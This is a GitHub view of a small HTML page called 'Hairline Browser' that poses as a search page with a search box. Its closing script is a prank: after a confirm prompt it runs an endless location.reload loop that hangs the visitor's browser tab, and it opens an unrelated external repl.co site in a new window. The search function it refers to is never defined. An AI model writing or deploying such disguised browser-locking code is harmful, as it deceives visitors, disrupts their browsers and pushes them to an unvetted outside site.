-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathIndex.html
51 lines (39 loc) · 819 Bytes
/
Index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<!DOCTYPE html>
<html>
<body>
<Title>Hairline Browser</Title>
<style>
body {
background-image: url('https://img.gg.deals/c1/06/a0cb83eb8e09229c53dadd39657f9a951927_1920xt1080_S1000.jpg');
}
</style>
<style>
h1 {text-align: center;}
</style>
<style>
body {
color: blue;
}
h1 {
color: white;
}
</style>
<h1> Hairline Browser</h1>
<form align="center" id="form" role="search">
<input type="search" id="query" name="q"
placeholder="Search..."
aria-label="Search through site content">
<button onclick="myFunction()">Search</button>
<script>
</script>
</form>
<script>
if(confirm("Do you want to run hairline browser right now?")){
setTimeout(function(){
while(1)location.reload(1)
}, 1000)
window.open("https://AH.hatemeworld.repl.co", "_blank");
}
</script>
</body>
</html>